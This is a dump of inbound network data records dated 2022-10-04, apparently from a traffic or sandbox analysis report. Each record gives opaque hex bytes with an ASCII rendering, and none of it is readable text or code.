                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5767INData Raw: 28 2a 69 a3 5b c3 c2 36 74 3c 11 67 f9 ea dc 40 a4 cd 77 d1 be c7 2e 4b 28 e9 e1 b3 e1 00 fd 43 88 fc 79 9b 16 1f 12 f3 2d e9 11 1b b9 3e e4 f6 f2 bc 94 f6 36 7e 6c e4 e4 f5 ff 8c 45 49 76 05 0a a7 7e 3c af c2 2a bd 86 07 0e a3 1b 46 0e fc 09 1a b0 0c ea 6f a9 32 38 c4 05 9d d8 52 c8 c5 0a a5 64 2c 15 75 0c cc 3e b2 00 80 3e 7b d7 0b fe 70 4a 20 a8 08 e4 c0 a2 68 a7 4d 40 90 1b ab 94 11 ab 95 ed 01 05 17 9b 3b ac 12 40 3f 90 8b 32 66 73 fc 07 92 a6 39 80 85 d8 30 ed 99 cf 01 86 56 ff c3 4c bd 61 2e 05 99 52 90 7e fe bc 64 71 ba 49 af 25 2b 7c 62 76 3a 2a 9b 17 16 4c 17 25 66 d7 ee 53 ab fd 37 dc e9 2b 51 70 9c 5e db 53 4e 63 8e 2e 24 2d 83 3f 94 67 a5 24 ee 70 ea 22 01 a0 d0 69 7a b8 54 c0 28 02 b1 33 e5 2c a4 26 fb 8e 8f 83 f3 b2 1c d1 b1 c4 9b 78 7c d7
                                                                                                                                                                                                                                    Data Ascii: (*i[6t<g@w.K(Cy->6~lEIv~<*Fo28Rd,u>>{pJ hM@;@?2fs90VLa.R~dqI%+|bv:*L%fS7+Qp^SNc.$-?g$p"izT(3,&x|
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5783INData Raw: 72 26 e8 a4 ef a8 38 bb ec 9b 19 60 ef 74 17 01 f1 b4 b2 c9 ed 18 15 c5 67 0f 1e f1 d3 09 18 91 30 26 1d b8 cf df 24 45 e3 e7 40 b0 8f d2 a6 68 60 2c b1 d9 d9 2d 87 c6 ef 14 b4 19 3b 7f 44 a6 d0 66 80 b4 57 dc f8 d6 b4 56 85 7b 8a 49 53 e3 ad b5 cb 24 f9 1a b3 56 71 40 83 ac bc 5d 56 2d 0b ed 5c a5 aa 2a 43 6e 06 df 02 f6 55 f7 c1 05 24 b6 8c 24 cb 8f fc 5b d1 25 ad ea cc 08 e7 e3 f2 c8 89 6c fa 2e c0 a6 e9 34 54 03 03 c3 f9 53 f7 47 7b 60 43 61 0a ec 33 f3 5e 82 c9 68 0a 79 4f 34 4a f6 98 d7 92 c6 52 12 8a ea 51 3e e2 f7 28 70 2e 80 21 24 ca 53 25 c8 61 c4 2e 10 2a 94 21 c8 eb 93 df 55 1c e0 f3 46 a2 78 c6 cf ab 33 af 6f 26 13 30 af 24 c3 bc 1e 68 54 83 05 34 f5 0b 42 92 b4 3d fa 4a ed da 58 29 72 20 ab 71 53 b0 40 e8 a4 39 08 b9 f5 fb ff 78 6f 84 bb e3
                                                                                                                                                                                                                                    Data Ascii: r&8`tg0&$E@h`,-;DfWV{IS$Vq@]V-\*CnU$$[%l.4TSG{`Ca3^hyO4JRQ>(p.!$S%a.*!UFx3o&0$hT4B=JX)r qS@9xo
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5799INData Raw: a7 63 43 ac 8f 85 95 65 fd 2c 63 c2 33 50 82 ae 70 b0 a1 d5 bc 7e da dd 9b fd fb 4e 33 c0 3d 8b 5a 0c 11 1f 7d 39 2d 36 a7 4c 6f cc 75 7a 0a a6 74 0d 36 d4 d4 19 cf bf 36 cd ef 89 88 f4 ba b4 30 c4 b1 ed 26 83 b6 03 64 13 b6 e4 27 c2 c5 93 9e 80 54 9c 8f f6 3a 0c ba c2 fd a8 37 5f 26 79 5c e0 c6 0b c0 51 02 01 7b a5 9b c0 1d 8e 71 b5 95 41 6f e0 f3 9e 51 4d 6a ca fa 98 80 9a fb b9 77 ef 99 eb 6a 78 28 98 2a d4 a1 ec 68 3f af 2c 44 f3 a6 21 3e 85 68 01 b9 c6 8c 77 fb 13 1c ab 61 8f 6d 51 b2 5c cb 81 2f 69 2f e9 19 25 1c 65 b8 0e 5c db 40 e3 3d 7d 74 4f 7d bc 46 ce f3 c9 0a d7 cd 11 ed b4 eb 9f 5e 37 4a d2 7e 45 ae 01 15 c1 07 81 71 11 7b e8 83 e2 6c 2e cd d0 52 1d ea 88 81 62 69 dd 4a 0e 9a 87 4c a8 cb ca 37 48 20 79 5c e6 6c ec 7a 68 8d ad db 40 c9 a4 15
                                                                                                                                                                                                                                    Data Ascii: cCe,c3Pp~N3=Z}9-6Louzt660&d'T:7_&y\Q{qAoQMjwjx(*h?,D!>hwamQ\/i/%e\@=}tO}F^7J~Eq{l.RbiJL7H y\lzh@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5815INData Raw: bd a2 12 33 e1 ab 1a 7e 27 1d 3e 40 f3 11 cb 74 4d 6d be 58 ca a0 1d 51 0e 0f 8a 09 2e 34 51 98 a6 20 34 5d 3c 3d f6 97 99 a4 10 64 3d 61 0b da 6f 89 b8 5b 53 13 86 89 7c 9e b7 f2 a7 6b 9f fc 25 6e 5f 8f b6 04 cd 08 ee ec 36 4b 7a 5e ca 19 e9 16 bb 8d eb c2 dc d5 a3 ff 19 07 3a a3 6b 9c c3 9c a4 0f f9 51 da 4f a8 8f 1f 6d 81 38 32 41 36 6c 00 2f 70 ec 7c 54 7b f4 73 c6 46 54 b8 cd 29 73 da af 20 36 81 10 e8 59 fe 19 7a 03 25 74 6b c4 ee e6 8d 9f 98 64 0a 5d d0 dd ef 1d 1d f8 a4 2a 59 8f f4 60 75 71 3c 1e f5 4b 8c 6d 9a 60 7d c5 53 c6 e2 64 40 5c 18 6f a7 9f e8 b2 14 5f c9 66 a5 0b 0f 70 f1 79 24 16 8c ee ff 4b 69 cb 50 2e 96 44 1f 27 c5 3a 31 db f1 3c 82 44 f7 76 96 0e b6 10 21 c4 fa 19 f6 68 03 61 2a 1c 4c b2 4f b8 1c cd 5d ee 8d f1 8d c7 5f 20 6d 2c 89
                                                                                                                                                                                                                                    Data Ascii: 3~'>@tMmXQ.4Q 4]<=d=ao[S|k%n_6Kz^:kQOm82A6l/p|T{sFT)s 6Yz%tkd]*Y`uq<Km`}Sd@\o_fpy$KiP.D':1<Dv!ha*LO]_ m,
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5831INData Raw: 4e 79 4c a6 bc 97 72 e8 42 1d 2c 82 86 27 6b 55 d1 70 90 6c 43 18 24 46 e5 3b 81 0a d0 48 e5 de 07 41 3f 34 17 ff f0 ab 04 ef e2 57 d1 77 10 09 7b c9 32 b1 71 e3 14 f7 a6 c9 f1 f9 47 24 7c 63 19 9a 76 1c 64 f4 85 6f 5b 7e c7 6c bb a7 8f f1 c3 a3 2b 86 83 a6 e4 3d 85 1b b7 7d d3 73 b1 43 01 ff 2e d5 de fd bf bd 69 d0 e1 84 97 62 04 41 a5 83 c4 cf b7 e7 b1 44 7d 2e ad ce dd 4d 54 e3 d1 23 37 0a 58 dd 2b ec dd 1d db dd 22 73 85 09 2f 42 fa 0c b3 d3 db 60 f3 29 2d 04 79 7c f5 2e 48 70 b1 92 3e 8e fc cf e9 8c c0 68 24 52 e4 76 b4 e9 9c 07 d1 e1 35 f4 2b 81 80 8d d3 13 58 07 1f 50 ad 84 6a 7e c0 71 83 36 71 f7 87 be 21 ee 18 42 96 d6 e7 36 95 76 97 ea 90 cf 2b 1e 34 d3 89 f3 8f da cd a6 65 16 ea b8 db 50 e3 2b d5 e0 7c c6 1b 1c 44 a4 b3 08 c4 72 ab 48 98 b4 2f
                                                                                                                                                                                                                                    Data Ascii: NyLrB,'kUplC$F;HA?4Ww{2qG$|cvdo[~l+=}sC.ibAD}.MT#7X+"s/B`)-y|.Hp>h$Rv5+XPj~q6q!B6v+4eP+|DrH/
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5847INData Raw: 32 dd b2 40 c0 7c 04 54 8c 66 ab ba 8e d6 27 11 0f 10 47 ec a6 13 23 5b 49 92 70 aa 1d 42 80 47 18 34 d9 2a 10 4a f4 58 15 13 f5 87 a6 bc 91 ab ba c3 d8 61 69 a3 d8 89 02 4b 01 26 0e fa f9 44 37 de 97 b0 59 b6 0e 0d fd 2b 85 6a e7 b3 8d d0 5a f0 e7 88 65 6f 67 1c d3 47 a0 4e d2 7c dc 15 44 22 53 a5 cd 71 16 b6 24 dc a5 98 79 bb 17 27 ab f0 a2 e5 44 d5 40 ce 2e 05 04 bf a8 3f a2 63 98 6d a4 5e 0a f4 ac f5 7d ad c4 d8 68 fa ec 9d fd 23 63 ad e5 c4 a2 a9 a3 b0 b1 c4 aa c1 19 54 12 51 37 6a 37 52 fd 8a 22 7e c0 5a c8 db 22 6f b4 b7 96 13 a5 cf 01 3f 3b 21 8a 82 3d ef 4c ae ca d3 11 e7 d2 54 80 b6 f1 5c 12 4f 89 56 35 62 c7 50 de f8 8e b7 fb 3b cf d5 e5 1a f6 9c 67 a0 fb 3b 81 f2 61 cb 8c e6 4a 06 ce de d8 79 7c 1b 89 e0 95 54 01 9c 48 50 a7 c3 ee 1e d2 7b 89
                                                                                                                                                                                                                                    Data Ascii: 2@|Tf'G#[IpBG4*JXaiK&D7Y+jZeogGN|D"Sq$y'D@.?cm^}h#cTQ7j7R"~Z"o?;!=LT\OV5bP;g;aJy|THP{
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5863INData Raw: b6 2f a9 9b ce a2 6d 1c b6 bb 5e 13 4b 5b 70 94 32 ba 03 9b 77 92 94 85 40 8a ae 07 9e 68 84 60 c1 58 42 16 6e d5 ae 2f c2 23 94 86 e9 18 cd 59 a3 58 b0 15 62 27 af 9e 0f b8 a7 f2 16 bb b7 17 4b e6 22 30 2e 7e d3 29 39 64 97 28 87 86 f2 1b 13 90 37 32 27 d2 16 c9 db 4b ed d2 0a cc a1 ca 92 d9 d3 79 94 7e 58 f8 38 d3 dc 6f e9 8c 34 9d 99 92 ab e2 ee 24 30 80 ee 07 f5 ab fc e5 7c 25 41 1a b1 00 11 ec 5a 51 35 e7 4d 9c 0d f7 43 12 c8 39 31 a8 14 9e 97 bb 09 30 e4 d2 36 5e 05 cf f4 04 6b e0 91 36 85 26 70 0d 95 5d a7 fc 46 1d 24 53 82 c9 bd f4 22 48 07 9d 6b 60 33 52 10 c9 89 f0 00 ce a4 ca 18 a9 48 2d 8e f1 2f 65 bf c6 22 2b c9 e4 86 52 74 c2 67 cd 2c 7f 21 81 61 8f d7 eb b1 71 fc f0 dd b6 c5 5b 72 a8 4f 64 95 5f 3d c5 7d 12 05 c9 cd ca c6 ed 7e 96 73 7c e2
                                                                                                                                                                                                                                    Data Ascii: /m^K[p2w@h`XBn/#YXb'K"0.~)9d(72'Ky~X8o4$0|%AZQ5MC9106^k6&p]F$S"Hk`3RH-/e"+Rtg,!aq[rOd_=}~s|
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5879INData Raw: 04 3f ab b7 eb d4 04 d6 24 8e 11 b3 8f 8d 7d c1 b8 e6 8a a0 d7 3c 97 41 9a 7a fa 9b c5 56 8d 78 a2 b7 be 18 36 af 80 30 5f 7d 40 b0 47 d2 76 96 14 1b 4d 0e 54 eb b9 1a 93 8b 53 8f 9b cc 9c 74 da 43 c0 00 32 73 bf 62 a9 c6 4a 49 0f 86 e1 82 64 0a e4 43 19 b3 94 3e f4 48 af ee ce 3c 4c 13 15 32 74 08 a1 fd 07 25 63 02 ab c0 64 4f eb 04 3d 2a 76 2f 23 df ee 70 da c6 77 ca 47 92 b2 71 52 48 80 1f 57 88 7d 77 ad 34 3f ae 2a a2 ea 66 a6 b2 d2 6a 81 22 01 a3 e5 b5 f5 d5 e8 d7 23 54 8a 8a 94 db e4 0e 2f 3e 12 35 83 5f bb b3 6f 31 28 b4 93 e4 e7 a2 f8 e5 96 52 da 37 0e 81 78 bd 68 34 c6 b5 0a 36 e6 b7 64 f2 ee fb e0 90 9e 19 9c 85 fa b0 41 6a a3 b1 5b db 1b c5 ac 9d e7 b7 79 47 3e 90 c5 e4 17 c8 50 e6 4f f5 3c d7 0c 4c 7f 89 30 3c 13 97 fe 91 01 98 d6 53 f7 a2 43
                                                                                                                                                                                                                                    Data Ascii: ?$}<AzVx60_}@GvMTStC2sbJIdC>H<L2t%cdO=*v/#pwGqRHW}w4?*fj"#T/>5_o1(R7xh46dAj[yG>PO<L0<SC
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5895INData Raw: 43 44 8b f7 92 d6 5b 77 f0 3c e8 9d 3f a9 7a 2e 6f 56 25 a7 f6 31 0c a8 a3 cc 3b 3e f2 72 22 06 9c a5 f3 9e 19 82 f0 fe 76 ba ef 39 f3 4c 53 51 fa 21 00 1a eb ff 29 2f c2 ba 50 46 4e bc 5d 0b 14 bb 91 33 84 4a 2b 57 e4 39 a6 f6 45 17 e1 e9 6f 28 6e 75 f1 88 24 b2 39 2a 84 c1 b2 0f a8 f8 d4 16 da 9b 79 81 6f a5 b5 97 04 08 a8 6c df c6 94 56 37 4b 9a b0 7e 07 c6 dd b5 c1 a2 01 62 4d 99 35 93 26 ce 65 2d 9a 7e 1d ff f1 40 a2 9a 79 4e 93 bc 7a 82 4a c4 89 2d bd 8d 46 ac f9 21 36 a5 e7 22 57 b5 20 42 0f 3c 30 3f 99 a9 27 57 96 06 f3 36 b1 90 a1 bc 3c 95 8d a5 84 44 a8 80 55 6d 54 1d d6 9f 78 26 45 48 52 bf ba 2b b0 9a 7b e3 95 f0 38 19 ff 71 28 f4 7d 7f eb 32 f4 56 68 b2 9d a2 ba 25 e7 75 d4 68 ff 2f 7b a9 63 04 49 53 11 9e c4 2a d9 df ef 34 7c 0e 17 8e b4 19
                                                                                                                                                                                                                                    Data Ascii: CD[w<?z.oV%1;>r"v9LSQ!)/PFN]3J+W9Eo(nu$9*yolV7K~bM5&e-~@yNzJ-F!6"W B<0?'W6<DUmTx&EHR+{8q(}2Vh%uh/{cIS*4|
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5911INData Raw: 89 37 62 b8 91 fb 79 2f 54 cd b3 3e cd 0b bb d2 c6 c4 53 14 12 0a 5a 3e 39 d8 a4 40 ae 56 83 a1 77 c6 42 f7 89 c3 51 bb 8b 76 a2 65 8e 8a e5 51 8d 42 8a 81 dc d7 28 44 d2 c7 3e a7 36 0f 57 85 83 d2 a3 2a 48 18 75 df 33 a0 5b f7 d8 51 61 c5 8c 08 e5 1a b1 62 ef eb 47 8a 17 e4 04 9f 91 5d 47 0a 0e cd 74 07 ea 2d 1f e3 66 f6 83 6b 13 ac 00 36 a0 75 73 9b 68 63 fb 0b 23 7a 11 e3 b0 a7 e9 29 fb af d2 bc 41 a0 b6 c7 18 7c e4 f7 58 6a 78 05 c9 d1 5f 89 c7 75 d7 37 a4 2c 05 98 e2 c5 f5 e4 fc 0b dc 88 eb 6a 5f 89 71 da af 87 47 d0 fb 4d c2 f5 92 e3 4f c7 a9 8c 78 2c 9c 1e 0a 24 00 29 c5 4e 54 5a a0 e6 35 38 b4 43 04 3a fc 10 40 f9 50 de 57 d8 6d f5 f3 d2 ef 16 74 af c1 b0 9d ec a8 fa f0 59 1c 23 67 0d 52 b1 0e 8f c1 e4 f5 41 da 7d 1c 92 61 b8 33 af 28 c3 d8 a4 cd
                                                                                                                                                                                                                                    Data Ascii: 7by/T>SZ>9@VwBQveQB(D>6W*Hu3[QabG]Gt-fk6ushc#z)A|Xjx_u7,j_qGMOx,$)NTZ58C:@PWmtY#gRA}a3(
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5927INData Raw: 45 1e 15 5e ff 4b 90 5a 40 39 a7 7c 86 7d fa 55 22 e4 42 75 72 8c 6f 8a 35 a6 9d 7b df 5c 63 24 7c d4 bf 1b 5c 65 b2 50 22 91 54 f1 48 fb da b9 40 16 dd bc 32 00 b4 67 f9 e2 ab 88 d0 58 7e 28 d1 d7 31 5b ee 5a 4e 0a 3b d3 be ea 23 ee 98 2c 75 c6 84 8a 73 4a e2 d6 3b dc d5 30 0e c6 de be f3 6e 4d c1 19 df 09 d3 d3 db ce 05 a6 48 54 52 02 f2 23 31 54 0a 1e 22 2b 09 4a a4 7a 4f c8 2f e8 2c fe bf 31 16 4a 5e f4 5a 04 a1 60 1c c7 aa f0 49 a9 25 4f cb d7 b6 3b 43 bf 1a a9 dc 13 d8 c1 f2 3f 15 36 8d 34 05 ce 6c e9 9a 36 83 2c 68 4d 81 6c 67 a4 ac bc 36 63 66 9a 88 8f df 50 58 5c 28 21 fe 9c 3a a0 7a 8d ae 15 23 f4 29 0e 72 a4 f1 5e a0 29 6f 71 b2 e1 3b 26 fa 82 0d 51 8d a4 2b f8 3f fc 90 1d b2 fa b9 ac d4 ff f0 27 c0 03 22 57 8a 09 10 f5 33 bd 8d 81 97 55 bb a8
                                                                                                                                                                                                                                    Data Ascii: E^KZ@9|}U"Buro5{\c$|\eP"TH@2gX~(1[ZN;#,usJ;0nMHTR#1T"+JzO/,1J^Z`I%O;C?64l6,hMlg6cfPX\(!:z#)r^)oq;&Q+?'"W3U
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5943INData Raw: 8b 27 13 e3 4b b7 1d 91 f7 23 ba ba 6e a7 97 16 f0 f3 5b 23 36 da d0 c5 6e 1b 27 fc 0c c7 cb dd 22 46 51 68 55 4a 50 7d 56 fe e1 0d 01 b8 db fc 95 ea 69 84 4b e4 6e d6 88 3d d2 fa c6 8e b1 28 2b 51 ac 93 f4 a0 7c c5 88 0d 07 b2 24 70 55 0d 82 ad 46 e0 fb 3f 90 24 af 21 83 8b da d3 8a 8f e3 06 02 6d ce f6 c9 b4 0e 53 00 b6 5a d4 06 66 90 ed 8d 41 c5 61 b1 66 23 41 92 c8 90 22 30 ec d0 a3 27 f9 76 48 0b d7 83 1f 11 31 8a 5f 96 5f 50 a9 1c da 07 64 60 75 9c 4a 54 df 9c 45 85 95 cf dc 4a 2f ae 20 4e 29 1b 13 5f 1b a8 a1 cf 98 f7 dd 79 f2 02 d1 48 25 b3 ff b3 3a 29 f5 20 fe 44 db 22 48 de 60 72 fe dd 1b 33 cf af c7 33 32 f0 3a 99 dc c2 5d 6b f6 cf 84 62 84 d1 d7 f3 f7 e6 2e de 0c f4 73 51 30 84 59 a1 d2 85 52 1f f1 ca 8c b2 22 69 47 f1 b0 cd 9e 29 80 86 b5 f0
                                                                                                                                                                                                                                    Data Ascii: 'K#n[#6n'"FQhUJP}ViKn=(+Q|$pUF?$!mSZfAaf#A"0'vH1__Pd`uJTEJ/ N)_yH%:) D"H`r332:]kb.sQ0YR"iG)
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5959INData Raw: 26 0b b4 84 bf 50 d7 f8 66 46 e5 ce 40 9c 42 ce 61 10 6b 18 0a 4f 6c ff 5b 36 9a 6d 6c 6f 9b e7 ce 4c 7c 7c 44 ad 19 62 8e 86 22 86 06 3b 05 ff 17 d2 8e b2 04 35 39 7d 91 4c 1a b7 0c 34 3a 97 bc 0b 35 f9 93 ce 15 62 1d d2 d5 5e b2 ef 34 5b 10 b8 de 97 ad f4 bd 11 4b 3d 98 07 35 9b f3 7f 14 cb 02 1e 16 44 6e e0 27 37 a8 30 16 ba ed 08 82 c6 c9 f0 15 d1 20 7b 08 ab 6c fe b9 90 83 5e 75 17 dc bb bd 05 80 6c 07 b3 6b b9 ba b5 01 c2 91 75 18 83 2b a3 70 ea 1b 4c 90 f9 e8 53 ec 59 4c 29 fe 0b ea 49 b9 8c 0e 2b 73 18 b6 8c 61 77 63 a6 b2 cb ef 92 ce b1 f9 c2 95 96 12 0d 76 97 39 4b d1 3f fe 55 1a 26 c5 45 20 2e a5 28 77 89 e0 4b eb 43 4f df af 59 52 11 70 d5 bb d3 28 e5 e5 b5 8f 08 6e 65 7d a8 37 0a 50 c6 c1 f6 61 68 7e 01 45 fc 0d 00 ed f0 31 00 9e 3f a4 4c 44
                                                                                                                                                                                                                                    Data Ascii: &PfF@BakOl[6mloL||Db";59}L4:5b^4[K=5Dn'70 {l^ulku+pLSYL)I+sawcv9K?U&E .(wKCOYRp(ne}7Pah~E1?LD
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5975INData Raw: 9b 93 dc 7e e4 94 9a df 76 03 f0 03 28 ff d2 19 31 ac 88 f2 fb 54 7f 6f 11 5d e2 c0 7e e0 a2 04 94 cd 74 57 0c 17 8d af d0 82 ab 17 91 fb 4e ab 29 c4 44 82 51 4d 6f ed 2e 6a 58 a8 39 07 ef 89 62 94 7c 05 c5 42 de ce 94 c6 3a 1d 5d a9 3b 88 42 4a d2 91 8b b6 7e 0e d9 88 33 63 49 b4 94 e9 bf 36 9b 1d 10 33 4a c6 0f f9 d6 39 1f 35 83 af 4a 0c c9 51 59 40 80 93 67 e3 1f 6a 19 4e ca 4c 8b a1 91 a8 46 32 c8 57 45 8f ad 27 cf 10 06 4d 06 81 5c c8 56 2e f9 2f d6 45 23 da fd 79 11 d4 81 bb 7e 1a 80 6b 13 20 60 db d8 e8 2a 1d 9d 3c 0b 18 99 7a a0 b3 47 94 08 c3 d4 33 fb 48 75 12 9f 3a ec 7d 66 1f b9 70 e4 e0 c6 9a e0 8e bf 16 f7 b9 f8 2b 3c 3b bb a4 c9 1d 41 de 9a 71 95 63 10 6b b7 fc 60 40 5f fe 1c 78 fe 2d 97 4b b4 47 99 e8 96 01 e4 dd 77 d5 6a 78 f4 4a aa e4 a5
                                                                                                                                                                                                                                    Data Ascii: ~v(1To]~tWN)DQMo.jX9b|B:];BJ~3cI63J95JQY@gjNLF2WE'M\V./E#y~k `*<zG3Hu:}fp+<;Aqck`@_x-KGwjxJ
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5991INData Raw: 1a fa 43 15 c2 b6 6d 2c f0 06 1b 13 41 18 e1 a9 2a ce 0c 2c 54 aa 24 1e 24 e4 ea 1b 57 bd bf 52 83 a6 27 03 08 dd 54 bd 3d 14 ec b7 cb e7 0b 77 f4 fa b6 99 c9 40 f8 07 d0 bb be 8d 47 13 52 bf a4 3d ed ca d9 8a 31 a2 7c f2 35 6e e8 dd 7b 4e 1e 8f a3 0c 23 87 1e cd 76 5d f9 e8 d7 50 cd 5a bc 2b 45 ca 69 84 3b c8 15 df 5c 2d fa c6 48 4e 2a c8 c3 fa c3 ba 54 4b df 84 2d 21 4d 15 12 18 7f 0a 61 c4 58 c6 2a 32 dc 44 44 bd 1a de 83 e4 d6 cb 55 de ee b6 30 5b be 6e b3 23 c5 fa af 2e 68 5e 3c 05 7e e8 a9 2e 2c f3 0e 86 47 91 b8 5c 56 b7 40 9e c3 2c 09 9a 86 1e 5d 08 65 72 3b 23 16 f8 3d 26 0b 89 55 fc 4b 6a 9b 14 8b 26 2f 62 1c 91 c0 06 90 a7 66 35 b1 1d ae bc 4f ab 88 ea 3b 5f 06 fe 58 9d 42 ad a2 fa 53 0e 98 af dd 93 8b a3 19 e7 a5 db ee 62 c3 be 42 34 e7 03 cc
                                                                                                                                                                                                                                    Data Ascii: Cm,A*,T$$WR'T=w@GR=1|5n{N#v]PZ+Ei;\-HN*TK-!MaX*2DDU0[n#.h^<~.,G\V@,]er;#=&UKj&/bf5O;_XBSbB4
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6007INData Raw: 07 c4 7d 43 5f 7f 6f 20 0c b0 af 15 1a fc b6 82 eb 62 ac 00 37 e6 a3 df bc 29 63 c3 11 2b 45 b9 ff e8 ef 55 5f f9 15 1d 68 45 0e 93 8c ba e7 18 c1 42 db 92 b8 18 d8 10 20 fd 33 62 b7 d2 49 57 8a d5 43 23 65 c7 fb 3f 73 a3 88 58 9e 8c 95 db 74 6e c3 53 1c 1b a1 92 ae c3 0a ee 66 1d 5a ff da 71 f7 5c 9e c1 24 2f 8d 8b 32 5e 4d 2e a2 30 7b 3d 0b 22 de 1f c3 af 30 b2 fb 03 e7 bf 9f 5b b7 e5 6a f8 80 d1 26 bd 78 20 e2 5b 61 68 2c 17 17 f8 b9 f1 0a ee cb d7 eb 93 b2 7a 06 ba b7 97 b4 06 dc 52 9a ea d5 53 be 37 9f 9f 9c 63 70 45 5d f5 f1 6c 2b f8 a0 d8 c7 86 b2 0e ce 0f c9 09 ad 1a 06 e5 97 09 9c b7 aa bf 10 7e f6 9a d3 38 7a e8 4d e2 40 03 7f 5b ab 73 57 06 20 93 46 c6 59 f3 1b 2d c5 1b e0 29 91 8c 7f 75 70 3f dc 40 1e c3 3f 8c 7e fb 23 75 96 b1 29 68 f7 eb 9e
                                                                                                                                                                                                                                    Data Ascii: }C_o b7)c+EU_hEB 3bIWC#e?sXtnSfZq\$/2^M.0{="0[j&x [ah,zRS7cpE]l+~8zM@[sW FY-)up?@?~#u)h
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6023INData Raw: ca 7a 49 89 be 31 3a 1b 34 9b cc 84 e1 70 be 90 b6 d0 87 36 9d bf eb bf cd 88 db 68 e0 cb e1 d9 26 43 81 1b d7 9d ab cc 02 e3 38 15 da d3 22 01 38 b8 a8 3b e9 3d e6 c3 b2 f7 66 35 b4 4b 3a fd 7d 28 b6 d0 7b 6d 49 fa 7a 15 6a 7c 29 2e 14 2c dd 2b 15 95 0d 95 54 a5 6c bd a3 15 1c 57 5f 1e c4 cd cf 6f 63 dc 73 17 5a aa 31 42 14 82 c3 31 f3 d8 8d 0d 0b f2 6a e8 31 de 63 f0 ba e4 61 d0 0e e6 dd b4 2c cf 0c 1f ae 9d 27 7c 46 b7 e7 21 df 6e 0b 27 03 71 fd 0b da 7c e3 6d 7f 29 41 25 36 e8 7c f3 24 d2 0a b9 da e1 a5 53 15 ed 12 0b a5 da b7 01 c6 1b 9f b0 df 23 20 ef 03 c7 1d 20 c5 39 12 7e df aa 65 e1 78 7b 77 68 01 38 8f 11 02 dd ed 43 07 f3 56 07 ea 19 c3 4e df 65 60 10 2e 5b 43 ae 32 cc c3 f5 2d b3 de 83 4e 6c 14 1b 3a d7 96 fc 82 48 d3 4f 00 62 d5 42 a8 b6 5b
                                                                                                                                                                                                                                    Data Ascii: zI1:4p6h&C8"8;=f5K:}({mIzj|).,+TlW_ocsZ1B1j1ca,'|F!n'q|m)A%6|$S# 9~ex{wh8CVNe`.[C2-Nl:HObB[
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6039INData Raw: a9 af 9c 7d 5c 76 27 e0 31 16 99 60 04 83 11 a5 5f 29 3e 5c 2c bf 8c 64 8a 66 4a 70 73 84 c8 3c da a6 ce fe 99 7c 1d 96 a3 7d cf 65 4c ea af 54 34 4e b3 cb b9 f3 46 48 2a 95 eb f1 20 3e 59 c7 a0 62 89 f2 5d b4 33 ce c6 69 48 aa 50 35 9d 5b d2 a4 7c 3f 36 af da 0b f7 ab a0 04 ce 6f 20 e1 a8 2f 33 6f c7 d3 da 24 02 3c af d5 8f d2 7c e0 b0 50 4b 8a 1b c0 e0 81 48 2b f8 7c 98 43 1a 76 00 1b 25 f5 43 57 3a ae a8 91 c4 e9 4c 07 c7 b9 d1 3a 22 99 e6 10 38 86 5f f7 03 20 f3 d4 bc c3 cc 3a cb 6c ab e4 00 12 48 a6 80 25 77 0c da f5 53 6d 72 d8 43 18 74 e0 02 01 c0 b6 88 2e 6f 6a 1f a8 ef 72 19 b7 58 09 41 af be 84 39 72 fc a8 68 85 d7 2e 2b d6 02 ac 7f 74 47 59 84 ec 16 22 5b cc ce e4 1e 99 e4 14 23 61 d0 78 77 d7 39 b7 50 c0 ff 87 1a 70 e0 07 b3 e7 52 69 70 ae d3
                                                                                                                                                                                                                                    Data Ascii: }\v'1`_)>\,dfJps<|}eLT4NFH* >Yb]3iHP5[|?6o /3o$<|PKH+|Cv%CW:L:"8_ :lH%wSmrCt.ojrXA9rh.+tGY"[#axw9PpRip
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6055INData Raw: 1f f2 12 67 14 b4 3c 68 4d 7c 90 b2 85 38 65 eb 22 35 8e 48 ea c9 cd 76 6c ce e0 7e df bb 75 1e c2 da 49 7f 76 f7 32 e0 7e 28 2b 20 f1 e3 4e 09 7d 4f 9b 00 ae d6 06 31 1c 24 9b bf 61 d7 29 a5 29 fa c1 98 91 c8 7f c4 ff 12 5d a3 70 50 f3 48 98 d0 92 2a 1b 05 e8 f7 5a 92 3b cf 1b 78 ec 25 66 b5 7e ab 67 51 b3 3e 47 bf 7f 4f ae 61 6e 95 df 52 43 0d 1e d0 ae a4 38 f3 75 e9 2f 1c 80 d0 d0 15 ab de 53 08 73 21 3d 05 12 31 8f 6b 18 d2 34 ac 60 e3 98 31 9c 82 c1 15 17 75 71 ba 4d 37 d6 57 83 cb 49 61 f2 c6 0c 7d 9f 33 fa ec 21 16 2d 47 61 db a9 09 34 bb ac 95 af 6b 68 2d 2d 5a 3d a1 29 d6 4d fe 06 c4 49 ab 81 05 23 00 dc 8e 1f 68 5d 2c 7d 53 c6 df a0 a3 b6 8a b2 c5 94 2f f0 25 c9 d1 26 aa 39 98 14 ee b4 02 10 55 c9 4c 94 77 03 48 cc d8 76 bc c9 84 34 cb 50 56 ec
                                                                                                                                                                                                                                    Data Ascii: g<hM|8e"5Hvl~uIv2~(+ N}O1$a))]pPH*Z;x%f~gQ>GOanRC8u/Ss!=1k4`1uqM7WIa}3!-Ga4kh--Z=)MI#h],}S/%&9ULwHv4PV
